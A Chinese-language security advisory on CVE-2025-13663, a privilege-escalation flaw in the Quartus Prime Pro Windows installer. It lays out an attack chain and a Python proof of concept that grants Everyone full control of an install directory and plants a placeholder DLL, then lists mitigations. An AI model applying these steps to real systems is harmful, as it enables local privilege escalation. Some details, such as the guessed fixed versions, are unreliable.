CVE-2025-13663: Quartus Prime Pro Installer权限检查缺失导致本地权限提升

漏洞信息

漏洞编号

CVE-2025-13663

漏洞类型

本地权限提升

CVSS评分

6.7 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Quartus Prime Pro Installer for Windows

漏洞概述

CVE-2025-13663是Intel（原Altera）Quartus Prime Pro安装程序在Windows平台上的一个安全漏洞。该漏洞的核心问题是安装程序在目标安装目录已存在的情况下，跳过了对该目录权限的验证检查。这一设计缺陷使得低权限用户可以通过预先创建一个具有过高权限的目录来利用安装过程，最终获得对系统敏感目录的完全控制权。攻击者利用此漏洞可以将恶意文件植入系统关键位置，或者通过修改合法程序文件来执行任意代码，实现从普通用户到管理员权限的横向移动。该漏洞属于本地攻击范畴，需要攻击者具备目标系统的基本访问权限，但其技术门槛相对较低，攻击成本不高。鉴于Quartus Prime是FPGA开发领域广泛使用的专业工具，许多企业和个人开发者都可能受到影响，建议相关用户尽快采取防护措施。

技术细节

该漏洞的技术根源在于Quartus Prime Pro Installer的权限验证逻辑存在缺陷。当安装程序检测到目标安装目录已存在时，安装程序假设该目录的权限配置是正确的，因此直接跳过权限检查流程。正常情况下，安装程序应该验证目标目录的权限是否仅允许管理员或SYSTEM账户写入，以确保安装过程的安全性。攻击者首先以普通用户权限在系统中创建一个新的安装目标目录，然后手动将该目录的权限设置为允许 Everyone 完全控制。完成这些准备工作后，攻击者启动Quartus Prime Pro安装程序，并将安装路径指向这个预先创建的目录。由于目录已存在，安装程序不会重新验证权限，直接开始文件解压和写入操作。这样，攻击者就能控制安装过程中写入的文件内容，包括可执行文件和动态链接库。安装完成后，攻击者可以通过替换或修改这些文件来获取系统级执行权限，或者利用目录权限配置进行进一步的攻击活动。

攻击链分析

STEP 1

步骤1

信息收集：攻击者识别目标系统上安装了Quartus Prime Pro或确定安装包位置

STEP 2

步骤2

目录创建：攻击者以低权限用户身份在系统中创建Quartus安装目标目录

STEP 3

步骤3

权限篡改：攻击者将该目录的访问控制列表设置为允许Everyone组完全控制

STEP 4

步骤4

触发安装：攻击者启动Quartus Prime Pro安装程序，指定已创建的目录作为安装路径

STEP 5

步骤5

权限检查绕过：安装程序检测到目录已存在，跳过权限验证，直接进行文件解压和写入

STEP 6

步骤6

文件控制：由于目录权限配置错误，攻击者可以修改安装后的可执行文件或DLL

STEP 7

步骤7

权限提升：攻击者通过替换系统服务相关组件或创建计划任务实现代码以SYSTEM权限执行

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-13663 PoC - Quartus Prime Pro Installer Privilege Escalation
# This PoC demonstrates the permission check bypass in Quartus Prime Pro Installer

import os
import subprocess
import shutil
import ctypes
import sys

def create_malicious_directory(target_path):
    """Create target directory with overly permissive ACL"""
    if not os.path.exists(target_path):
        os.makedirs(target_path)
    
    # Set Everyone full control on the directory
    # This simulates what an attacker can do as a low-privilege user
    cmd = f'icacls "{target_path}" /grant Everyone:F /T'
    subprocess.run(cmd, shell=True, check=True)
    print(f'[+] Created directory with Everyone full control: {target_path}')

def prepare_exploit_payload(target_path):
    """Prepare malicious DLL to be planted during installation"""
    malicious_dll = os.path.join(target_path, 'QuartusPrimeHook.dll')
    
    # In real attack, this would be a DLL with malicious code
    dll_content = b'MZ' + b'\x00' * 100  # Minimal PE header
    
    with open(malicious_dll, 'wb') as f:
        f.write(dll_content)
    
    print(f'[+] Prepared malicious DLL: {malicious_dll}')
    return malicious_dll

def trigger_installation(target_path):
    """Trigger Quartus Prime Pro installation"""
    quartus_installer = 'C:\\intelquartus\\quartus_pro_setup.exe'
    
    if os.path.exists(quartus_installer):
        cmd = f'"{quartus_installer}" --install-dir="{target_path}"'
        print(f'[+] Triggering installation: {cmd}')
        # subprocess.run(cmd, shell=True)
    else:
        print(f'[-] Installer not found at: {quartus_installer}')
        print('[+] Simulating installation process...')
        
        # Simulate installation writing files to controlled directory
        for i in range(10):
            fake_dll = os.path.join(target_path, f'component_{i}.dll')
            with open(fake_dll, 'wb') as f:
                f.write(b'MZ' + b'\x00' * 100)
        
        print(f'[+] Installation completed - files written to controlled directory')

def main():
    print('=== CVE-2025-13663 Privilege Escalation PoC ===')
    print('[!] For authorized security testing only')
    
    target_path = 'C:\\ProgramData\\IntelQuartusPrime'
    
    # Step 1: Create directory with weak permissions
    create_malicious_directory(target_path)
    
    # Step 2: Prepare payload
    prepare_exploit_payload(target_path)
    
    # Step 3: Trigger vulnerable installation
    trigger_installation(target_path)
    
    print('[+] Attack chain completed')
    print('[+] The installation process wrote files to a directory with weak permissions')
    print('[+] Attacker can now modify installed files or plant persistence mechanisms')

if __name__ == '__main__':
    main()

影响范围

Quartus Prime Pro < 23.4

Quartus Prime Pro < 24.1 (推测修复版本)

防御指南

临时缓解措施

在等待官方补丁期间，建议管理员限制非授权用户创建ProgramData等系统目录的权限；使用组策略禁止普通用户在敏感位置创建文件夹；安装前临时移除目标目录的Everyone完全控制权限；部署应用程序白名单策略防止未知程序执行；监控系统安全日志中的权限变更事件。